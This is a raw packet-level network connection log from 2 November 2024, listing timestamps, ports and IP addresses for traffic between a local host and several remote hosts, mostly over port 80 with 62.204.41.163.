Nov 2, 2024 17:56:58.663820982 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.663835049 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.663851023 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.663881063 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664037943 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664048910 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664082050 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664103985 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664186954 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664200068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664213896 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664226055 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664227009 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664241076 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664247990 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664253950 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664266109 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664268970 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664280891 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664280891 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664316893 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664632082 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664647102 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664658070 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664673090 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664685011 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664688110 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664702892 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664710045 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664735079 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664757013 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.664944887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.664989948 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665028095 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665041924 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665055037 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665069103 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665081978 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665082932 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665097952 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665112019 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665123940 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665155888 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665399075 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665412903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665426016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665440083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665451050 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665476084 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665685892 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665702105 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665713072 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665724993 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665736914 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665750027 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665759087 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665772915 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665781021 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665786982 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665801048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665810108 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665813923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665821075 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665834904 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665848017 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665853024 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665862083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.665872097 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665895939 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.665913105 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.666398048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.666455030 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.666537046 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.666549921 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.666563034 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.666575909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.666579008 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.666589022 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.666599989 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.666604996 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.666615009 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.666620016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.666630030 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.666651011 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.666668892 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.689640045 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.690291882 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.690310001 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.691365957 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.691426039 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.691916943 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.691977978 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.692235947 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.692244053 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.710658073 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.710725069 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.710983992 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.711035967 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.711323023 CET	443	50000	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.711421967 CET	443	50000	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.711491108 CET	443	50000	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.711549044 CET	50000	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.711643934 CET	50000	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.711643934 CET	50000	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.711662054 CET	443	50000	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.711672068 CET	443	50000	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.715106010 CET	50005	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.715135098 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.715221882 CET	50005	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.715379953 CET	50005	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.715390921 CET	443	50005	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.731184006 CET	443	49999	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.731261969 CET	443	49999	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.731327057 CET	49999	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.731635094 CET	49999	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.731662035 CET	443	49999	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.731676102 CET	49999	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.731683969 CET	443	49999	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.734450102 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.735028982 CET	50006	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.735060930 CET	443	50006	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.735126972 CET	50006	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.735249996 CET	50006	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.735269070 CET	443	50006	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.782824993 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.782883883 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.782887936 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.782903910 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.782932043 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.782943010 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783091068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783103943 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783117056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783130884 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783145905 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783149004 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783193111 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783400059 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783418894 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783446074 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783457994 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783476114 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783489943 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783500910 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783515930 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783529043 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783531904 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783555031 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783572912 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783776045 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783787012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783797979 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783813000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783823013 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783826113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783838034 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.783854008 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783862114 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.783895969 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784092903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784105062 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784116983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784130096 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784142017 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784147978 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784154892 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784177065 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784205914 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784384012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784396887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784410000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784423113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784435034 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784470081 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784471989 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784554005 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784585953 CET	443	49996	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.784727097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784744024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784758091 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784770966 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784782887 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784784079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784796000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784809113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.784812927 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784826040 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784854889 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.784921885 CET	443	49996	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.785058022 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785070896 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785083055 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785100937 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785103083 CET	49996	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.785113096 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785125971 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785131931 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.785131931 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.785156012 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.785180092 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.785213947 CET	49996	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.785222054 CET	443	49996	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.785233974 CET	49996	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.785238981 CET	443	49996	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.785307884 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785320997 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785340071 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785352945 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785362005 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.785366058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785378933 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785388947 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.785393000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.785407066 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.785437107 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.787802935 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.787816048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.787853956 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.787884951 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.787920952 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.787924051 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.787934065 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.787945986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.787966967 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.787992001 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.788057089 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.788094997 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.788659096 CET	50007	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.788671970 CET	443	50007	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.788856030 CET	50007	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.789005995 CET	50007	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:58.789016962 CET	443	50007	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:58.821819067 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.821846008 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.821908951 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.821911097 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.821955919 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.823698044 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.823709965 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.830235958 CET	50008	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.830282927 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.830524921 CET	50008	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.830732107 CET	50008	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.830749989 CET	443	50008	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.874737978 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.874754906 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.874798059 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.874830008 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902124882 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902159929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902190924 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902204037 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902218103 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902218103 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902254105 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902254105 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902288914 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902302027 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902441025 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902453899 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902467012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902471066 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902513027 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902513027 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902667999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902678967 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902689934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902703047 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902714968 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902729988 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.902734995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902745962 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.902832031 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903063059 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903074980 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903085947 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903100967 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903116941 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903131008 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903141022 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903178930 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903350115 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903362036 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903377056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903388977 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903399944 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903419971 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903429985 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903464079 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903642893 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903655052 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903666019 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903678894 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903693914 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903700113 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903745890 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903745890 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.903983116 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.903995037 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904006004 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904016972 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904030085 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904047966 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904061079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904072046 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904078960 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.904084921 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904097080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904103994 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.904103994 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.904109001 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904120922 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904133081 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904135942 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.904145002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904156923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.904162884 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.904162884 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.904227018 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.904227018 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.905092001 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905103922 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905114889 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905127048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905138016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905150890 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905168056 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.905173063 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905184031 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905195951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905206919 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.905206919 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905220985 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.905225039 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.905251026 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.905332088 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.908742905 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.908765078 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.908951044 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.978661060 CET	443	49998	13.107.246.45	192.168.2.7
